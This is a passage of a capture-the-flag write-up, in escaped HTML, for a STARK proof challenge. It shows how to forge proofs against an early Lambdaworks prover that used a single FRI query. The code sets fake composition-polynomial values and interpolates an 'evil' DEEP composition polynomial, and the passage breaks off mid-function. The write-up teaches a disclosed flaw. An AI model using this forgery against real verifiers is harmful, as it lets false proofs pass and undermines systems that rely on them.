&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h1 id=&quot;starks-challenge&quot;&gt;STARKs challenge&lt;&#x2F;h1&gt;
&lt;h2 id=&quot;challenge-2&quot;&gt;Challenge&lt;&#x2F;h2&gt;
&lt;p&gt;Good morning hacker.&lt;&#x2F;p&gt;
&lt;p&gt;If you are reading this, the date should be July 7th, 2023, and you should be checking the Lambda-Ingonyama CTF challenges site.&lt;&#x2F;p&gt;
&lt;p&gt;Hopefully, we managed to hijack the site, and you are reading this now. We are not allowed to say much, but you must know it’s of utmost importance that you win this challenge.&lt;&#x2F;p&gt;
&lt;p&gt;So, we have decided to help. Don’t worry; it should be easy. We have found the right exploit to solve and are forwarding the solution to you.&lt;&#x2F;p&gt;
&lt;p&gt;If something goes wrong, we leave some additional data we have collected. We don’t know if it’s helpful, but we hope it can help.&lt;&#x2F;p&gt;
&lt;p&gt;It’s now up to you to take the flag. We wish you good luck.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ingonyama-zk&#x2F;ZKCTF-ch3-client&quot;&gt;https:&#x2F;&#x2F;github.com&#x2F;ingonyama-zk&#x2F;ZKCTF-ch3-client&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;FLAG FORMAT: ZKCTF{XXX…XXX}&lt;&#x2F;p&gt;
&lt;h2 id=&quot;solution-2&quot;&gt;Solution&lt;&#x2F;h2&gt;
&lt;p&gt;The key point here is that the STARK prover performs only one query, which makes the soundness error significant. This vulnerability was present in an early implementation of Lambdaworks (see this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;starknet_stack_prover_lambdaworks&#x2F;pull&#x2F;66&quot;&gt;PR&lt;&#x2F;a&gt;) and was discovered by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;mcarilli&quot;&gt;Michael Carilli&lt;&#x2F;a&gt; (to whom we are really grateful).&lt;&#x2F;p&gt;
&lt;p&gt;The first step is to send the data to an endpoint of the server, which should reply with something like “Expired proof.” The next step is to inspect the proof. Most of the data is not relevant; counting the number of queries, we realize there is only one. It now remains to see how to exploit this.&lt;&#x2F;p&gt;
&lt;p&gt;Some additional data is needed, such as the offset, the constraints, and the blowup factor. The offset and constraints are hinted at in the data; the blowup factor can be guessed or inferred from hints.&lt;&#x2F;p&gt;
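As a rough back-of-the-envelope estimate (the precise FRI soundness bounds are subtler), each query contributes about $\log_2(\text{blowup factor})$ bits of security. The helper below, `security_bits`, is an illustrative name, not part of any library:

```rust
// Rough estimate only: treat each FRI query as contributing about
// log2(blowup_factor) bits of security. The exact soundness analysis
// is more involved; this is just to show the order of magnitude.
fn security_bits(blowup_factor: u32, num_queries: u32) -> u32 {
    blowup_factor.ilog2() * num_queries
}

fn main() {
    // A single query with blowup 4 gives only ~2 bits: a cheating prover
    // passes with probability around 1/4, so forging a proof is cheap.
    assert_eq!(security_bits(4, 1), 2);
    // Reaching ~80 bits at blowup 4 needs on the order of 40 queries.
    assert_eq!(security_bits(4, 40), 80);
    println!("1 query @ blowup 4 ≈ 2 bits; 40 queries ≈ 80 bits");
}
```

This is why a one-query proof, as in this challenge, can be brute-forced: an attacker only needs a handful of attempts before a fake proof slips through.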
&lt;p&gt;We can now move on to breaking the STARK protocol, taking advantage of the FRI soundness error, which is quite large for a single query. We must first pass the consistency check at the out-of-domain point $z$ between the composition polynomial and the trace polynomials. The verifier performs this check in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;starknet_stack_prover_lambdaworks&#x2F;blob&#x2F;23eb9df082ec4de4f1d44c6760be4b7a13ea24b1&#x2F;src&#x2F;starks&#x2F;verifier.rs#L208&quot;&gt;step 2&lt;&#x2F;a&gt;. We can pass this test automatically if we calculate the value of the polynomial directly from the trace polynomials:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn composition_poly_ood_evaluation_exact_from_trace&amp;lt;F: IsFFTField, A: AIR&amp;lt;Field = F&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    air: &amp;amp;A,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trace_ood_frame_evaluations: &amp;amp;Frame&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain: &amp;amp;Domain&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    z: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rap_challenges: &amp;amp;A::RAPChallenges,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    boundary_coeffs: &amp;amp;[(FieldElement&amp;lt;F&amp;gt;, FieldElement&amp;lt;F&amp;gt;)],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_coeffs: &amp;amp;[(FieldElement&amp;lt;F&amp;gt;, FieldElement&amp;lt;F&amp;gt;)],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; FieldElement&amp;lt;F&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let _public_input = air.pub_inputs();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_constraints = air.boundary_constraints(rap_challenges);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let n_trace_cols = air.context().trace_columns;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_constraint_domains =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        boundary_constraints.generate_roots_of_unity(&amp;amp;domain.trace_primitive_root, &amp;amp;[n_trace_cols]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let values = boundary_constraints.values(&amp;amp;[n_trace_cols]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Following naming conventions from https:&#x2F;&#x2F;www.notamonadtutorial.com&#x2F;diving-deep-fri&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut boundary_c_i_evaluations = Vec::with_capacity(n_trace_cols);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut boundary_quotient_degrees = Vec::with_capacity(n_trace_cols);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for trace_idx in 0..n_trace_cols {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let trace_evaluation = &amp;amp;trace_ood_frame_evaluations.get_row(0)[trace_idx];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let boundary_constraints_domain = &amp;amp;boundary_constraint_domains[trace_idx];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let boundary_interpolating_polynomial =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;Polynomial::interpolate(boundary_constraints_domain, &amp;amp;values[trace_idx])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .expect(&amp;quot;xs and ys have equal length and xs are unique&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let boundary_zerofier =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            boundary_constraints.compute_zerofier(&amp;amp;domain.trace_primitive_root, trace_idx);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let boundary_quotient_ood_evaluation = (trace_evaluation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            - boundary_interpolating_polynomial.evaluate(z))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F; boundary_zerofier.evaluate(z);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let boundary_quotient_degree = air.trace_length() - boundary_zerofier.degree() - 1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        boundary_c_i_evaluations.push(boundary_quotient_ood_evaluation);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        boundary_quotient_degrees.push(boundary_quotient_degree);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let trace_length = air.trace_length();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_term_degree_adjustment = air.composition_poly_degree_bound() - trace_length;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_quotient_ood_evaluations: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt; = boundary_c_i_evaluations&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(boundary_coeffs)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|(poly_eval, (alpha, beta))| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            poly_eval * (alpha * &amp;amp;z.pow(boundary_term_degree_adjustment) + beta)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_quotient_ood_evaluation = boundary_quotient_ood_evaluations&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .fold(FieldElement::&amp;lt;F&amp;gt;::zero(), |acc, x| acc + x);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let transition_ood_frame_evaluations =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        air.compute_transition(trace_ood_frame_evaluations, rap_challenges);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let transition_exemptions = air.transition_exemptions();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let x_n = Polynomial::new_monomial(FieldElement::&amp;lt;F&amp;gt;::one(), trace_length);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let x_n_1 = x_n - FieldElement::&amp;lt;F&amp;gt;::one();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let divisors = transition_exemptions&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .into_iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|exemption| x_n_1.clone() &#x2F; exemption)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut denominators = Vec::with_capacity(divisors.len());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for divisor in divisors.iter() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        denominators.push(divisor.evaluate(z));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement::inplace_batch_inverse(&amp;amp;mut denominators);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut degree_adjustments = Vec::with_capacity(divisors.len());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for transition_degree in air.context().transition_degrees().iter() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let degree_adjustment =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            air.composition_poly_degree_bound() - (air.trace_length() * (transition_degree - 1));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        degree_adjustments.push(z.pow(degree_adjustment));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let transition_c_i_evaluations_sum =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ConstraintEvaluator::&amp;lt;F, A&amp;gt;::compute_constraint_composition_poly_evaluations_sum(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;transition_ood_frame_evaluations,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;denominators,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;degree_adjustments,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            transition_coeffs,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;boundary_quotient_ood_evaluation + transition_c_i_evaluations_sum&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The prover splits the composition polynomial into its even and odd parts, $H_1$ and $H_2$. The verifier has to compute $H(z)$ from the trace polynomials and then check that&lt;br &#x2F;&gt;
$H(z) = H_1 (z^2 ) + z H_2 (z^2 )$&lt;br &#x2F;&gt;
We can pass this check by making sure that the verifier gets $H_1 (z^2 ) = H(z)$ and $H_2 (z^2 ) = 0$. Of course, this will create issues in other parts of the verifier, such as the DEEP composition polynomial, which lets us check that all the polynomials have been correctly evaluated at $z$:&lt;br &#x2F;&gt;
$P_0 (x) = \sum_j \gamma_j \frac{t_j (x) - t_j (z)}{x - z} + \sum_j \gamma^\prime_j \frac{t_j (x) - t_j (g z)}{x - gz} + \gamma \frac{H_1 (x) - H_1 (z^2 )}{x - z^2} + \gamma^\prime \frac{H_2 (x) - H_2 (z^2 )}{x - z^2}$&lt;&#x2F;p&gt;
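&lt;p&gt;As a sanity check of the identity above, here is a minimal, self-contained sketch (plain Rust over the toy prime field $\mathbb{F}_{97}$, not lambdaworks) showing that splitting a polynomial into its even- and odd-degree coefficients satisfies $H(z) = H_1 (z^2 ) + z H_2 (z^2 )$:&lt;&#x2F;p&gt;

```rust
// Toy prime field F_97; all field constants here are illustrative.
const P: u64 = 97;

fn add(a: u64, b: u64) -> u64 { (a + b) % P }
fn mul(a: u64, b: u64) -> u64 { (a * b) % P }

/// Evaluate a polynomial (coefficients in low-to-high order) at x via Horner.
fn eval(coeffs: &[u64], x: u64) -> u64 {
    coeffs.iter().rev().fold(0, |acc, &c| add(mul(acc, x), c))
}

/// Split coefficients into even- and odd-index parts so that
/// H(X) = H1(X^2) + X * H2(X^2).
fn split_even_odd(h: &[u64]) -> (Vec<u64>, Vec<u64>) {
    let h1 = h.iter().step_by(2).copied().collect();
    let h2 = h.iter().skip(1).step_by(2).copied().collect();
    (h1, h2)
}

fn main() {
    // H(X) = 3 + 5X + 7X^2 + 2X^3 over F_97.
    let h = [3, 5, 7, 2];
    let (h1, h2) = split_even_odd(&h);
    let z = 10;
    let z2 = mul(z, z);
    let lhs = eval(&h, z);
    let rhs = add(eval(&h1, z2), mul(z, eval(&h2, z2)));
    assert_eq!(lhs, rhs);
    println!("H(z) = {} = H1(z^2) + z*H2(z^2)", lhs);
}
```

In the real protocol, $H_1$ and $H_2$ are committed separately, which is precisely what the attack exploits by feeding the verifier fake values for them.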
&lt;p&gt;Of course, if we send false values for $H_1 (z^2 )$ and $H_2 (z^2 )$, the last two terms will not be low-degree polynomials and should not pass FRI testing. However, we can compute the exact values of $(H_k (\omega_j) - H_k(z^2 ))&#x2F;( \omega_j - z^2 )$ and, by interpolation, create a polynomial that passes through as many of these evaluations as the low-degree test allows (the trace length). The following function computes the DEEP composition polynomial:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn compute_deep_composition_poly_evil&amp;lt;A: AIR, F: IsFFTField&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    air: &amp;amp;A,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain: &amp;amp;Domain&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trace_polys: &amp;amp;[Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    round_2_result: &amp;amp;Round2&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    round_3_result: &amp;amp;Round3&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    z: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    primitive_root: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    composition_poly_gammas: &amp;amp;[FieldElement&amp;lt;F&amp;gt;; 2],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trace_terms_gammas: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    lambdaworks_math::field::element::FieldElement&amp;lt;F&amp;gt;: lambdaworks_math::traits::ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Compute composition polynomial terms of the deep composition polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_1 = &amp;amp;round_2_result.composition_poly_even;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_1_z2 = &amp;amp;round_3_result.composition_poly_even_ood_evaluation;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_2 = &amp;amp;round_2_result.composition_poly_odd;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_2_z2 = &amp;amp;round_3_result.composition_poly_odd_ood_evaluation;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let gamma = &amp;amp;composition_poly_gammas[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let gamma_p = &amp;amp;composition_poly_gammas[1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let z_squared = z.square();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; 𝛾 ( H₁ − H₁(z²) ) &#x2F; ( X − z² )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_1_term = {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let x = Polynomial::new_monomial(FieldElement::one(), 1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let h_1_num = gamma * (h_1 - h_1_z2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let h_1_denom = &amp;amp;x - &amp;amp;z_squared;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        interp_from_num_denom(&amp;amp;h_1_num, &amp;amp;h_1_denom, domain)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    };&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; 𝛾&amp;#39; ( H₂ − H₂(z²) ) &#x2F; ( X − z² )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_2_term = {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let x = Polynomial::new_monomial(FieldElement::one(), 1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let h_2_num = gamma_p * (h_2 - h_2_z2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let h_2_denom = &amp;amp;x - &amp;amp;z_squared;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        interp_from_num_denom(&amp;amp;h_2_num, &amp;amp;h_2_denom, domain)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    };&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Get trace evaluations needed for the trace terms of the deep composition polynomial&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let transition_offsets = &amp;amp;air.context().transition_offsets;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
